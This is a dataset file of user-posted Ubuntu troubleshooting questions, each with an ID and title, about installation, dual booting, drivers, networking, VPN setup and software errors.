400259	no download for 13.04 raring ringtail	i have 13.04 raring ringtail os , installed from usb but to install other vender software like google earth , it requests the installation cd/dvd , which i never had , but now need . the usb installation media is long gone , so how do i download and cut a cd with 13.04 if the download does not exist ?
400264	delete ghost guest folders	can i safely delete the `` guest-weirdcode '' folders created in the /media folder everytime someone logs in using the guest-session option ? ( using ubuntu 13.04 ) edit : sorry , i can not reply to the answers so i do it here : @ gabrielf : yes , they persist . i agree they should be removed by the system , but for some reason they are not = ( @ gunnar-hjalmarsson : i also agree with you , they should be removed . thank you for proposing the code change . as both of you said , this folder contains the user folders , from which the user can access the hard disk partitions/usb stick contents once they are mounted . now my question is ... can i safely delete them manually ? is it safe ? or should i use some command because there 's some system file that must be updated or something ? thank you in advance .
400268	no notification when i change brightness and/or volume	i user ubuntu gnome 13.10 ( gnome shell 3.8 ) . when i change the volume or brightness via hotkeys or my volume +/- buttons on my keyboard i do not get the notification in the middle of the screen . other notifications ( bottom of screen ) work . is there a way to enable the notification again ?
400278	openvpn : how do you put multiple ca certificates & config files in the openvpn folder ?	i have several ca certificate files and config files for various vpn servers . the way ( from what i understand ) openvpn works is that you load a config file with the command : sudo openvpn -- config 'xx/xxx/xx ' and you will run your config file with server information . you will also need a ca.crt file in the /etc/openvpn/ folder for the client to connect to the server , this works great when you deal with one server , however , what do you do when you have nine different servers ? is there a way to have multiple ca.crt files in the /etcx/openvpn folder and is there a command so you can choose which one you wish to load ? thanks . cheers .
400279	is possible to install windows using wine ?	i 'm trying to switch to windows 8 on a desktop computer . i purchased and downloaded the digital setup ( wanted an installation disk but apparently it 's unavailable ) , but it wo n't open ! i have wine configured to windows 7 .
400282	mounting 2nd hard drive ( win7 )	i have ubuntu 13.10 installed on my internal hard drive and iâm tiring to mount a 2nd internal to recover data off it . it has win7 home installed on it . i am having problems mounting it . what is the simple way to do so . i am also looking at restoring the win7 os ; am i able to do this from ubuntu ? when i run sudo fdisk -l i get . sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu -- vg-root does n't contain a valid partition table disk /dev/mapper/ubuntu -- vg-swap_1 : 4026 mb , 4026531840 bytes 255 heads , 63 sectors/track , 489 cylinders , total 7864320 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu -- vg-swap_1 does n't contain a valid partition table disk /dev/mapper/cryptswap1 : 4026 mb , 4026531840 bytes 255 heads , 63 sectors/track , 489 cylinders , total 7864320 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xdb9f63a9 disk /dev/mapper/cryptswap1 does n't contain a valid partition table jpfeiff @ jpfeiff-et1331g : ~ $
400283	pc wo n't boot from usb	lately i have been trying to boot using a usb . however , every time i try to boot , it says 'operating system not found ' when there 's clearly an os on the usb . yesterday i was with a friend who inserted his usb , which it worked . but i tried 2 usb 's + 1 sd card and all of them wo n't work . i 've even tried different usb ports . did n't help . i highly doubt it that it 's just my usb + sd card that wo n't work . 1 usb was actually new and never used before . does anyone know what might cause the 'operating system not found ' message ?
400284	key binding , command not working , but works in terminal	i have the following two commands that i would like to bind to the key . i have opened the keyboard application in ubuntu ... system setting > keyboard . and have made a custom command that i have named `` desk '' and another `` tv '' . and have put the following into command : desk : xrandr -- output virtual1 -- off -- output dp3 -- off -- output dp2 -- off -- output dp1 -- off -- output hdmi3 -- mode 1920x1080 -- pos 0x0 -- rotate normal -- output hdmi2 -- off -- output hdmi1 -- off -- output lvds1 -- off -- output vga1 -- mode 1920x1080 -- pos 1920x0 -- rotate normal tv : xrandr -- output virtual1 -- off -- output dp3 -- off -- output dp2 -- off -- output dp1 -- off -- output hdmi3 -- off -- output hdmi2 -- mode 1920x1080 -- pos 0x0 -- rotate normal -- output hdmi1 -- off -- output lvds1 -- off -- output vga1 -- mode 1920x1080 -- pos 1920x0 -- rotate normal these work when i execute them directly in terminal , but not with the shortcut key that i create . any ideas ? thank you
400286	while upgrading to ubuntu 13.10 my battery went off , now the screen is off	while i was upgrading the new ubuntu 13.10 , my battery went off , so my laptop only shows a black screen ( nothing appears on it ) . please some clues on how to recover previous data and so . thank you .
400287	how do i install ubuntu on lenovo laptop , y510p ?	i just bought a lenovo ideapad y510p laptop 2 about months ago and , of course , it comes with windows 8.1 . i would really like to download one of the linux disributions ( ? ) like ubuntu or mint etc. , and be able to choose between linux and windows whenever i power on my laptop . i know there 's the `` dual boot '' option , but i 've never installed it by myself . i 've been using the dual boot thing ( ? ) on my desktop for the last 4 years and i really like using ubuntu 99.9 % of the time but i like having the option to use windows in case there 's a need , like for a class project at school . in the past , my friend has installed ubuntu for me as i sat and watched him work on the installation through the `` command line , '' but my friend is living in china at the moment . i read some stuff online from others who 've tried doing this on similar or identical lenovo laptops , but i 'm worried because i read that there are problems with the compatibility of some of the drivers with the y510p . one guy on a forum explained that this model is `` anti-linux '' or `` anti-ubuntu . '' i 've had my new laptop for 2 months and want to put a linux os on it . how do i go about doing this ? please help , i 'm getting tired of using windows after mostly using linux for 4 years . william
400288	how do i change my default java directory ?	i am new to ubuntu and am trying to set up java to run and compile programs . as i am very fresh , i am not sure how to tell which version i am using but file /sbin/init returns : elf 64-bit lsb shared object , x86-64 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.24 , buildid [ sha1 ] =0x7aa29ded613e503fb09fb75d94026f3256f01e7a , stripped the problem i have is when it comes to running the java programs . although the programs compile they do n't seem to run . i used this guide : http : //www.wikihow.com/install-oracle-java-on-ubuntu-linux and everything seems fine until i go to run the program i get this error message : bash : /usr/bin/java : no such file or directory java is supposed to be run from /usr/local/java and the /etc/profile has : java_home=/usr/local/java/jdk1.7.0_45 path= $ path : $ home/bin : $ java_home/bin jre_home=/usr/local/java/jre1.7.0_45 path= $ path : $ home/bin : $ jre_home/bin export java_home export jre_home export path i 'm sure i 'm missing something really simple . thanks in advance .
400289	server with virtualisation ?	i am considering making a ubuntu server based on the intel nuc product category . i recently made a ubuntu server in a virtual machine on an old macbook and i very much liked the idea of being able to easily and securely update the server software this way because i could make sure that the server was turned on most of the time . do any of you know if it is very resource intensive to run a server in a virtual machine rather than only running the server os ? i would of course not use the desktop os for `` conventional '' stuff .
400290	static ip setup breaks internet connection	specs os : ubuntu 12.0.4 server router : netgear genie wndr3700v2 goal to give my ubuntu server a static ip address so i could eventually forward a router port to it and make it accessible via the internet . background i disabled ipv6 by adding the below lines to the bottom of my /etc/sysctl.conf : net.ipv6.conf.all.disable_ipv6 = 1 net.ipv6.conf.default.disable_ipv6 = 1 net.ipv6.conf.lo.disable_ipv6 = 1 problem once i setup a static ip using the below /etc/network/interfaces file , i ca n't connect to the internet . /etc/network/interfaces 1 # this file describes the network interfaces available on your system 2 # and how to activate them . for more information , see interfaces ( 5 ) . 3 4 # the loopback network interface 5 auto lo 6 iface lo inet loopback 7 8 # the primary network interface 9 auto eth0 10 iface eth0 inet static 11 address 192.168.0.111 12 netmask 255.255.255.0 13 gateway 192.168.0.0 14 network 192.168.0.1 15 broadcast 192.168.0.255 16 dns-nameservers 192.168.0.1 17 18 # this is an autoconfigured ipv6 interface 19 # iface eth0 inet6 auto any ideas or suggestions for troubleshooting this would be greatly appreciated .
400292	should i make the jump from windows 8	i feel like trying something new . i 'm on windows 8 right now and i use it simply for using the internet , gaming , and homework . i 'm mostly scared of compatibility issues . do you think i would enjoy the switch ? p.s i 'm getting into programming with basic languages like javascript will it be easier in any way ?
400296	is it possible to use tkinter , pygame , and maybe virtualgl on ubuntu touch ?	what i mean is , will i be able to connect it to a monitor , keyboard , and mouse , and use it like i would any other ubuntu desktop ? can i put a large sd card in it for file storage ? i am thinking about switching from having a laptop and phone to just an ubuntu phone , because phones are so much lighter and have such good battery life compared to my old 2008 macbook pro . also , i am pretty experienced with linux and i work on a lot of python projects . will i be able to use tinter and pygame ? what about a virtualgl client ?
400300	installing ubuntu 12.04 alongside win7	ok , i 've noticed alot of people asking this question . but none of the solutions works for me . keep in mind i have never touched ubuntu before . i want to try out ubuntu and get to know it . here is my problem . when i boot up ubuntu from my usb device the option to install alongside windows 7 is gone . i have 2 drives in my computer . one 120gb ssd and one 1tb hdd . i want to install ubuntu on my ssd where windows 7 already is installed . i 've read about ubuntus limitations to 4 partitions , i only got 3 ( my 1tb included ) so it 's only 2 partitions on my ssd . i 've reduced my primary partition on the ssd so ubuntu can have 10gb . and i 've kept those 10gb as `` unlocated space '' . but still it wo n't detect the partition . i tried some guys step by step guide , where he used a program named gdisk . but the terminal in ubuntu wo n't recognize the command . so what should i do now ? any advice ? please remember that i have no experience with linux at all , so giving me a lot of advance steps might not help . just think of me as stupid if that helps : ) thanks !
400301	xorg problem after changing driver	i 'm running xubuntu 13.10 on a 64bit machine , with kernel 3.11.0-15-generic . in the settings panel > software and updates , tab additional drivers , i switched the default driver to a proprietary driver . after a reboot , huge problem . i type my password and the x server seems to crash . i ca n't do anything . i 'm only able to switch to another tty . how can i fix this ? i should maybe switch back to the former driver , but how ? my /etc/var/xorg.0.log is here link thanks update : solved . from tty0 , i did sudo aptitude purge fglrx ; sudo dpkg-reconfigure xserver-xorg and everything now works
400302	can i install 64 bit windows app in 32bit-ubuntu using wine ?	i have a doubt that will the wine ( 32bit ) run a 64 bit windows application.i did n't tried , but i have to install a sony vegas 12 pro.if can please tell how . answers maybe appreciated .
400304	using ubuntu and win7 on two drives	i would like to dualboot . i have ubuntu 13.10 on one hard drive and win7 home on another . i’ve been using ubuntu for a long time but i don’t know where to start . what is the easy way to get this done ?
400306	realtek 8188ee wireless driver solved	per following the instructions here : wireless not working on toshiba satellite c55-a5281 i get stuck with an error while trying to make the source . this is on debian cc [ m ] /home/aurora/binaries/backports-3.11-rc3-1/compat/compat-3.3.o in file included from /usr/src/linux-headers-3.2.0-4-common/arch/x86/include/asm/swiotlb.h:4:0 , from /usr/src/linux-headers-3.2.0-4-common/arch/x86/include/asm/dma-mapping.h:14 , from /home/aurora/binaries/backports-3.11-rc3-1/backport-include/asm/dma-mapping.h:3 , from /usr/src/linux-headers-3.2.0-4-common/include/linux/dma-mapping.h:68 , from /home/aurora/binaries/backports-3.11-rc3-1/backport-include/linux/dma-mapping.h:3 , from /usr/src/linux-headers-3.2.0-4-common/include/linux/skbuff.h:32 , from /home/aurora/binaries/backports-3.11-rc3-1/backport-include/linux/skbuff.h:3 , from /home/aurora/binaries/backports-3.11-rc3-1/compat/compat-3.3.c:13 : /home/aurora/binaries/backports-3.11-rc3-1/backport-include/linux/swiotlb.h:11:29 : error : static declaration of ‘swiotlb_nr_tbl’ follows non-static declaration /usr/src/linux-headers-3.2.0-4-common/include/linux/swiotlb.h:27:22 : note : previous declaration of ‘swiotlb_nr_tbl’ was here make [ 8 ] : *** [ /home/aurora/binaries/backports-3.11-rc3-1/compat/compat-3.3.o ] error 1 make [ 7 ] : *** [ /home/aurora/binaries/backports-3.11-rc3-1/compat ] error 2 make [ 6 ] : *** [ _module_/home/aurora/binaries/backports-3.11-rc3-1 ] error 2 make [ 5 ] : *** [ sub-make ] error 2 make [ 4 ] : *** [ all ] error 2 make [ 3 ] : *** [ modules ] error 2 make [ 2 ] : *** [ modules ] error 2 make [ 1 ] : *** [ modules ] error 2 make : *** [ default ] error 2 issue is with the kernel i had . the latest stable version of debian was with kernel 3.2 . i had to add the testing repository to my /etc/apt/sources.list and then update to a newer kernel .
400315	having problem installing updates and softwares	when tried installing the updates from the update manager got the error as check if you are using third party repositories . if so disable them , since they are a common source of problems . furthermore run the following command in a terminal : apt-get install -f and then went to terminal and tried sudo apt-get update and then tried sudo apt-get upgrade which gave the following error the following packages have unmet dependencies : libgsm1 : i386 : depends : libc6 : i386 ( > = 2.3.4 ) but it is not installed libschroedinger-1.0-0 : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not installed depends : libgcc1 : i386 ( > = 1:4.1.1 ) but it is not installed depends : liborc-0.4-0 : i386 ( > = 1:0.4.16 ) but it is not installed libva1 : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not installed libvpx1 : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not installed e : unmet dependencies . try using -f .
400322	issue with ubuntu live usb installer graphical glitches	i have been trying to install ubuntu 13.10 on my hp pavilion dv2500 laptop for a while now . i had no issues with 12.04 and 12.10 , but when i tried installing ubuntu 13.10 these graphical glitches started happening . i even tried it with ubuntu gnome 13.10 , and it had the same issues . i tried the usb installer on another computer , and it had no problem running the installer except for the fact that i had to disable the splash screen so that it could boot to the desktop . can you guys help me ? p.s . i had success with installing ubuntu 13.04 !
400326	how to find vb and fortran95 compilers after downloading from ubuntu ?	so , simple download from repository and i have no idea what has happened to the vb and fortran 95 compilers and documentation . my program experience is > 30 yrs ago on z80 sharp sbasic on mz700 . being a very old `` newbie '' a keystroke by keystroke guide would help as i seem to miss the obvious . by the by ... any recommendations for a double precision maths basic compiler please ?
400328	openvpn fails to start	i wish to start a vpn server with my old computer . i have to connected to one of the ethernet ports on the back of my router . i have tried to set up a bridge vpn however the openvpn service fails when i try to start it . i would greatly appriciate if anyone could check the config files below /etc/network/interfaces # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface # iface lo inet loopback # auto br0 # iface br0 inet static # address 192.168.1.103 < -- - if possible , could someone # netmask 255.255.255.0 < -- - also explain what these # network 192.0.2.0 < -- - are for ( the machine , the vpn etc ) . # broadcast 192.0.2.255 < -- - # bridge_ports eth0 # bridge_fd 9 # bridge_hello 2 # bridge_maxage 12 # bridge_stp on # bridge_prio 1000 # auto eth0 # iface eth0 inet dhcp /etc/openvpn/server.conf # local 192.168.1.103 # port 1194 # proto udp # server-bridge 192.168.1.103 255.255.255.0 192.0.2.160 192.0.2.170 # dev tap0 # ca ca.crt # cert server-vpn.crt # tun-mtu 1454 # key server-vpn.key # dh dh1024.pem # up `` /etc/openvpn/up.sh br0 tap0 1500 '' # down `` /etc/openvpn/down.sh br0 tap0 '' # ifconfig-pool-persist ipp.txt # keepalive 10 600 # comp-lzo # persist-key # persist-tun # verb 3 # mute 20 # status openvpn-status.log # client-config-dir ccd # client-to-client the `` /etc/openvpn/openvpn-status.log '' file is empty if anyone could point out a flaw with the code , that would be awesome , as i am still new to vpn programming ( the most i 've done is configure hamachi ... till now ) liam
400329	monitor all changes a program made during the installation	ubuntu 12.04 64 i would like to monitor all changes a program make to my system during the installation and first startup . is there any solution how i can monitor this ? i checked out `` iwatch '' and `` iotop '' but that doesnt seem to be what i need from my point of view . gui would be great but terminal will also be okay . thanks a lot
400331	black screen after reboot from fresh install 13.10	i keep getting a black screen after i click restart now after a fresh install . and when i manually shut it off and reboot it does n't accept my password what can i do to fix this ?
400335	dd decreased the size of ssd	my 32 gb ssd was partitioned with 8 gb and 29 gb . i used dd to write ubuntu iso onto my pendrive but accidentally wrote it to my 8 gb partition of my ssd . now gparted dosent show that 8 gb partition . how do i recover it ? ? the command was dd if=path_to_iso of=/dev/sdb where sdb is the ssd output of sudo fdisk -l is : warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xb367fbf3 ` device boot start end blocks id system /dev/sda1 1 976773167 488386583+ ee gpt partition 1 does not start on physical sector boundary . ` warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 32.0 gb , 32017047552 bytes 255 heads , 63 sectors/track , 3892 cylinders , total 62533296 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x01a1f343 ` device boot start end blocks id system ` and output of df -h is : filesystem size used avail use % mounted on /dev/sda7 303g 8.3g 280g 3 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 2.9g 4.0k 2.9g 1 % /dev tmpfs 594m 1.2m 593m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.9g 288k 2.9g 1 % /run/shm none 100m 44k 100m 1 % /run/user output of sudo parted -l is : model : ata st500lt012-9ws14 ( scsi ) disk /dev/sda : 500gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 1049kb 525mb 524mb fat32 efi system partition boot 2 525mb 567mb 41.9mb fat32 basic data partition hidden 3 567mb 701mb 134mb microsoft reserved partition msftres 4 701mb 1215mb 514mb ntfs basic data partition hidden , diag 5 1215mb 153gb 152gb ntfs basic data partition msftdata 7 153gb 484gb 331gb ext4 8 484gb 489gb 5243mb linux-swap ( v1 ) 6 489gb 500gb 11.0gb ntfs microsoft recovery partition hidden , diag model : ata liteonit lms-32l ( scsi ) disk /dev/sdb : 32.0gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags it was by mistake that i forgot to put sdb1 sudo parted /dev/sdb print free gives : model : ata liteonit lms-32l ( scsi ) disk /dev/sdb : 32.0gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 32.3kb 32.0gb 32.0gb free space gparted shoows 29 gb as unallocated
400340	qt 5 crashed while installation ?	qt 5 crashed in ubuntu 12.04 during installation a black screen appears and the installation stops .
400342	pc ca n't find my hdd after lubuntu 13.10 crash	i installed zram aftrer that , i got out of memory and after that system crashed now my pc ca n't detect my hdd error i see is , `gave up booting for root device -boot args -check rootdelay= -check root= -missing modules alert ! /dev/disk/by-uuid/ does not exist dropping to a shell ( intramfs ) _` i booted from live usb and now i ca n't find my hdd !
400343	trying to create a python virtual environment but getting oserror	i have installed python3.3 , pip-1.5 , ditribute-0.7.3 , virtualenv-1.11 . i am giving the below command to create virtual environment virtualenv -- no-site-packages test i am getting the following error name @ server : ~/py_virenv $ virtualenv -- no-site-packages test using base prefix '/usr/local' new python executable in test/bin/python3 not overwriting existing python script test/bin/python ( you must use test/bin/python3 ) installing setuptools , pip ... complete output from command /home/swamydkv/py_virenv/test/bin/python3 -c `` import sys , pip ; pip ... ll\ '' ] + sys.argv [ 1 : ] ) '' setuptools pip : traceback ( most recent call last ) : file `` < string > '' , line 1 , in < module > file `` < frozen importlib._bootstrap > '' , line 1565 , in _find_and_load file `` < frozen importlib._bootstrap > '' , line 1532 , in _find_and_load_unlocked file `` /usr/local/lib/python3.3/site-packages/virtualenv-1.11-py3.3.egg/virtualenv_support/pip-1.5-py2.py3-none-any.whl/pip/__init__.py '' , line 9 , in < module > file `` < frozen importlib._bootstrap > '' , line 1565 , in _find_and_load file `` < frozen importlib._bootstrap > '' , line 1532 , in _find_and_load_unlocked file `` /usr/local/lib/python3.3/site-packages/virtualenv-1.11-py3.3.egg/virtualenv_support/pip-1.5-py2.py3-none-any.whl/pip/log.py '' , line 8 , in < module > file `` < frozen importlib._bootstrap > '' , line 1565 , in _find_and_load file `` < frozen importlib._bootstrap > '' , line 1532 , in _find_and_load_unlocked file `` /usr/local/lib/python3.3/site-packages/virtualenv-1.11-py3.3.egg/virtualenv_support/setuptools-2.0.2-py2.py3-none-any.whl/pkg_resources.py '' , line 2696 , in < module > file `` /usr/local/lib/python3.3/site-packages/virtualenv-1.11-py3.3.egg/virtualenv_support/setuptools-2.0.2-py2.py3-none-any.whl/pkg_resources.py '' , line 429 , in __init__ file `` /usr/local/lib/python3.3/site-packages/virtualenv-1.11-py3.3.egg/virtualenv_support/setuptools-2.0.2-py2.py3-none-any.whl/pkg_resources.py '' , line 443 , in add_entry file `` /usr/local/lib/python3.3/site-packages/virtualenv-1.11-py3.3.egg/virtualenv_support/setuptools-2.0.2-py2.py3-none-any.whl/pkg_resources.py '' , line 1722 , in find_in_zip file `` /usr/local/lib/python3.3/site-packages/virtualenv-1.11-py3.3.egg/virtualenv_support/setuptools-2.0.2-py2.py3-none-any.whl/pkg_resources.py '' , line 1298 , in has_metadata file `` /usr/local/lib/python3.3/site-packages/virtualenv-1.11-py3.3.egg/virtualenv_support/setuptools-2.0.2-py2.py3-none-any.whl/pkg_resources.py '' , line 1614 , in _has file `` /usr/local/lib/python3.3/site-packages/virtualenv-1.11-py3.3.egg/virtualenv_support/setuptools-2.0.2-py2.py3-none-any.whl/pkg_resources.py '' , line 1488 , in _zipinfo_name assertionerror : /usr/local/lib/python3.3/site-packages/virtualenv-1.11-py3.3.egg/egg-info/pkg-info is not a subpath of /usr/local/lib/python3.3/site-packages/virtualenv-1.11-py3.3.egg/virtualenv_support/setuptools-2.0.2-py2.py3-none-any.whl/ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ... installing setuptools , pip ... done . traceback ( most recent call last ) : file `` /usr/local/bin/virtualenv '' , line 9 , in < module > load_entry_point ( 'virtualenv==1.11 ' , 'console_scripts ' , 'virtualenv ' ) ( ) file `` /usr/local/lib/python3.3/site-packages/virtualenv-1.11-py3.3.egg/virtualenv.py '' , line 820 , in main symlink=options.symlink ) file `` /usr/local/lib/python3.3/site-packages/virtualenv-1.11-py3.3.egg/virtualenv.py '' , line 988 , in create_environment install_wheel ( to_install , py_executable , search_dirs ) file `` /usr/local/lib/python3.3/site-packages/virtualenv-1.11-py3.3.egg/virtualenv.py '' , line 956 , in install_wheel 'pip_no_index ' : '1' file `` /usr/local/lib/python3.3/site-packages/virtualenv-1.11-py3.3.egg/virtualenv.py '' , line 898 , in call_subprocess % ( cmd_desc , proc.returncode ) ) oserror : command /home/swamydkv/py_virenv/test/bin/python3 -c `` import sys , pip ; pip ... ll\ '' ] + sys.argv [ 1 : ] ) '' setuptools pip failed with error code 1 name @ server : ~/py_virenv $ please help me in resolving this .
400348	ubuntu not detecting my new wifi connection	i am using ubuntu 13.10 . i have a wifi router setup whose connection is not getting detected by ubuntu . it works fine on my other laptop which also has ubuntu . it also works with the windows dual boot install i have on my system , just not ubuntu . i remember having a similar problem with opensuse 12.3 on the same laptop , but i ca n't remember how i fixed it . it detects neighbors connections etc , but not my connection . when i try to connect using hidden network , it still does n't work . the driver it shows is intel pro wireless something something
400349	strange behaviour ubuntu	i am an ubuntu noob and after last update i got ubuntu crashed . i have tried several solutions and finally got an working ubuntu but every time i now start the pc , i get the `` low graphics '' window and nothing can be done from there . i fix it by swithing to tty and : sudo jockey-text -e kmod : nvidia_304 # everytime i have to change the driver , if once it is 304 , then the next time i have to use for ex 304_updates sudo killall xorg sudo service lightdm start it happens again and again when i start my pc.i have already tried all the existing nvidia drivers and result is the same . any ideas how i can fix it ? my system : os : ubuntu 13.10 64-bit with gnome 3.10.1 graphics : geforce gtx 560/pcie/sse2 cpu : intel® core™ i5-2400 cpu @ 3.10ghz × 4
400350	windows partition lost after installing ubuntu	i installed ubuntu on my laptop using live creator usb , unfortunately i selected fresh installation of ubuntu , so it wiped my windows 8 , now i am trying to reinstall windows 8 using windows 8 cd , it says that there is no windows partition , what can i do to retrieve windows partition .
400351	swaping keyboard shortcuts	i installed ubuntu 12.04 lts on my laptop . everything works fine . i want to change the default keyboard shortcuts . currently super key - > for opening the dash home super + w - > spread windows in current workspace i want to swap these 2 shortcuts ( i.e ) super + w - > for opening the dash home super - > spread windows in current workspace thanks for help
400352	gedit vs log files	my default editor is gedit and while opening only kern.log and ufw.log i got following error : there was a problem opening the file /var/log/kern.log . the file you opened has some invalid characters . if you continue editing this file you could corrupt this document . you can also choose another character encoding and try again . character encoding current local ( utf-8 ) i can open other type of log files without this error . so please solve the problem ? i also reinstalled both ufw and gedit just to try . $ uname -a linux pcmy 3.8.0-35-generic # 50~precise1-ubuntu smp wed dec 4 17:28:45 utc 2013 i686 i686 i386 gnu/linux thanks minerz029 . i tried to follow the file and was successfully opened the file without that previous error eventhough i got a little tail one ( mentioned below ) gedit /var/log/ufw.log | tail -f tail : can not follow `- ' by name after that when i did gedit /var/log/ufw.log the very first error `` the file you opened has some invalid characters . if you continue editing this file you could corrupt this document . '' was no more . i had restarted the pc as well in morning ( just to be precise , but not sure about the effect : - ) ) .
400357	error while trying to install variflex	now when i try this , it shows : $ csh -c ./vrfx_make **** default potential included in executable **** variflex : undefined variable . and no executable is generated . this is the installation of variflex code for the reaction rate .
400360	install usb modem of olive v-fc9300 in ubuntu 11.10	i have ubuntu 11.10 installed alongside win xp . i have an internet connection of tata docomo walky named olive v-fc9300 . i can use internet via driver of walky in windows xp . now i want to install modem of walky in ubuntu 11.10 . i have been tried many things to solve it like , i hve installed following.. wvdial_1.61-4_i386.deb libwvstreams4.6-extras_4.6.1-2build1_i386.deb libwvstreams4.6-base_4.6.1-2build1_i386.deb libuniconf4.6_4.6.1-2build1_i386.deb when i enter command for detecting modem wvdial.conf result is command not found ... please help me to solve this problem . i want to use internet in ubuntu via olive walky modem.. so please help me . thank you
400363	bfgminer not catching xdotool	i 'm trying to send a short sequence of keystrokes to bfgminer without bringing its window to focus , it is running in a gnome-terminal . # ! /bin/bash xdotool key -- window 25165831 p sleep 1 xdotool key -- window 25165831 s sleep 1 xdotool key -- window 25165831 0 nothing happens . although when i run the following script it works . # ! /bin/bash xdotool windowactivate 25165831 sleep 1 xdotool key p sleep 1 xdotool key s sleep 1 xdotool key 0 i have looked into expect but it is large and complex , i 'm just looking for a short an simple solution . although it seems from what i read that expect could get the job done . maybe using expect would be better if xdotool conflicts with user interaction while it is executing my script . any help is appreciate ! : )
400366	boot to shell script	i want to make a live usb boot just to execute a script with echo off . then , i want it to continue to boot on to the original os . i need to repair a bunch of computers that got attacked through the network . select few have slight changes so , i would like it to continue to boot just to test . the faster the better because i have ~250 to get through . so , essentially i 'm asking if i can boot to run a shell script .
400372	regarding ubuntu installation on windows 7 64-bit	i want to install ubuntu 12.04.1 ( desktop i386 ) on my hp laptop which already has windows 7 installed on it . i have an ubuntu setup file as iso file in my usb . my question is , if i install ubuntu through usb or by copying it on windows 7 and then installing ubuntu , will any of the data stored in my hard disk is lost ? ... because i have 200gb of data which i do n't want to lose . i want both windows 7 and ubuntu to run on my same laptop . is this possible ? my laptop configuration : hp pavilion g series ram - 4gb windows 7 os - 64-bit intell core i3 2330m cpu , 2.20ghz thanks for your quote . well , my laptop hard disk capacity is 500gb , and currently my hard disk is holding around 275gb of data . well , it 's almost more than half . so i think ubuntu needs 20gb of free space . now the thing is that i am having only one drive which is c drive , it 's holding around 275gb of data , which includes the windows setup , all other software installations , and also my personal important data which is around 92gb . all this is only in the c drive . i have two more drives which are of 15gb and 4gb . one is the recovery drive ( d drive ) and the other one is hp_tools drive ( e drive ) . is it possible to make one more drive so that i will install ubuntu on that drive ? i mean is it possible to shrink it ?
400374	tried to disable gui now neither gui or text loads	i am brand new to ubuntu server ( or even having a server ) . i installed ubuntu server , installed a gui using sudo apt-get install ubuntu-desktop so that i can check for other software graphically . after finding what i needed i wanted to boot to tty ( command line ) each time . i have seen it mentioned to change a parameter to `` text '' but my grub file is `` read only '' and i was n't sure how to gain root to edit that file . i then typed sudo apt-get remove lightdm and seemed to have made a mistake . the machine now shows ubuntu and the loading circles but does nothing . what have i done , and how do i get back to command line boot , with gui option ?
400376	ubuntu 12.04 gets jammed untill a force restart	i have 12.04 ( precise ) 32-bit ( kernel linux 3.5.0-43-generic ) installed on my intel® core™ i7-3770 cpu @ 3.40ghz × 8 pc at home for about 8 months . now within the last 3 days i has jammed and got stuck that i could not do anything with it but restarting it by force shutdown thorgh power button . i have 8 gb of memory and i have no memory-consuming application running ! ! i wonder what might be the cause of this ! any advice would be greatly appreciated !
400377	grub appearing twice when windows 8 os is chosen but loads ubuntu when ubuntu is chosen	on starting my laptop , i get a grub menu . i have ubuntu 13.10 and windows 8.1 dual boot . when i choose ubuntu ( default os ) ubuntu will load normally . when i choose windows loader , once again the grub appears and once again i have to select windows loader to load windows . can i know how to fix it ?
400379	how to sync my dropbox files with a preferred local folder ?	i installed dropbox using following commands cd ~ & & wget -o - `` https : //www.dropbox.com/download ? plat=lnx.x86 '' | tar xzf - then i ran the demon with this command : ~/.dropbox-dist/dropboxd now i want to sync my dropbox data with the /var/www local directory . is it possible ?
400382	fan control for i5 in lenovo t520 not working	i have a lenovo t520 , which is annoyingly loud all the time . my cpu however does n't do anything and the bios is set to `` balanced mode '' . i tried to check , and the fan control is set to automatic , and even correctly tells the fan to run at low speeds or turn off : root @ xubuntu : ~ # cat /proc/acpi/ibm/fan status : enabled speed : 1974 level : auto root @ xubuntu : ~ # cat /proc/acpi/ibm/fan status : enabled speed : 0 level : auto however , my fan is ignoring that completely , running happily all the time on full speed despite having the ondemand governor set : tux @ xubuntu : ~ $ cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor ondemand
400383	is there a ubuntu server minimal cd ?	is there a ubuntu server minimal cd ? this can be helpful when you want to install ubuntu on a server through kvm by selecting a local iso file and the upload speed on your local computer is not great .
